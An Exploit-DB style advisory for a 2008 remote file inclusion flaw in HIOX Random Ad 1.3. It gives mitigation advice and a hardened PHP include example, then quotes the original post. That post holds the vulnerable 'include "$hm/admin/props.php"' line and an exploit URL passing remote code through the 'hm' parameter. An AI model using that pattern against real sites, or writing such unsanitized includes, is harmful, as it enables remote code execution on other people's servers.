Vendor: HIOX Random Ad
By: Ghost Hacker
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion (RFI)
CWE: 98
Product Name: HIOX Random Ad
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:hscripts:hiox_random_ad:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability

HIOX Random Ad 1.3 contains a Remote File Inclusion (RFI) vulnerability. The 'hm' parameter of the 'hioxRandomAd.php' script is not properly sanitized before being used in an 'include' function call. This can be exploited to include arbitrary remote files by passing a URL as the 'hm' parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the 'php.ini' file.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in an 'include' function call. Additionally, ensure that 'allow_url_include' is set to 'Off' in the 'php.ini' file.
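
One way to apply the mitigation above, as an added example that is not HIOX's code or part of the advisory: the include base is canonicalized and checked against an allowlist before it reaches 'include'. ALLOWED_BASES, props_path() and the sample inputs are hypothetical; only the quoted 'include' line comes from the advisory.

```php
<?php
// Added example (not HIOX code): validate the include base before use.
// Assumptions: ALLOWED_BASES, props_path() and the directory layout are
// hypothetical. php.ini should also carry: allow_url_include = Off

const ALLOWED_BASES = [__DIR__];   // directories the script may load props from

/**
 * Return the canonical path of admin/props.php under $hm, or null when $hm
 * is not a usable string, is a URL or stream wrapper, or resolves to a
 * directory that is not listed in ALLOWED_BASES.
 */
function props_path($hm): ?string
{
    if (!is_string($hm) || $hm === '' || strpos($hm, "\0") !== false) {
        return null;
    }
    // realpath() only resolves local paths: it returns false for http://,
    // ftp://, php:// and data: values, and for directories that do not exist.
    $base = realpath($hm);
    if ($base === false
        || !in_array($base, array_map('realpath', ALLOWED_BASES), true)) {
        return null;
    }
    // Resolve the final file too, so a symlink cannot lead outside the base.
    $file = realpath($base . '/admin/props.php');
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// Vulnerable original, as quoted in the advisory:
//     include "$hm/admin/props.php";
//
// Hardened call pattern:
//     $path = props_path($hm);
//     if ($path === null) { http_response_code(400); exit; }
//     include $path;

// Constructed sample inputs: a local base, a remote URL, a traversal attempt.
foreach ([__DIR__, 'http://remote.example/x', '../../etc'] as $candidate) {
    $path = props_path($candidate);
    echo $candidate, ' => ', $path === null ? 'rejected' : "include $path", PHP_EOL;
}
```

The local base is accepted only when admin/props.php actually exists beneath it; the other two inputs are rejected regardless of the 'allow_url_include' setting.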

Exploit-DB raw data:

####################################################################################################
 HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
 Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon  :) 
####################################################################################################
[~] Found by : Ghost Hacker  - R-H Team -                      |,  .-.  .-.  ,|
[~] My Blog : http://gh0st10.wordpress.com                     | )(_o/  \o_)( |
[~] My Email : Ghost-r00t@Hotmail.com                          |/     /\     \|
[~] Name Script : HIOX Random Ad 1.3
[~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Error (hioxRandomAd.php) :
include "$hm/admin/props.php";
[~] Exploit :
http://xxxx.com/[path]/hioxRandomAd.php?hm=Evil_Code
#############################[ I love the Messenger of Allah Mohammad ]#############################
[~] Greetz :
Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz ,
All Members Real Hack & Members Arabs Security And All My Friends ,
####################################################################################################

# milw0rm.com [2008-07-30]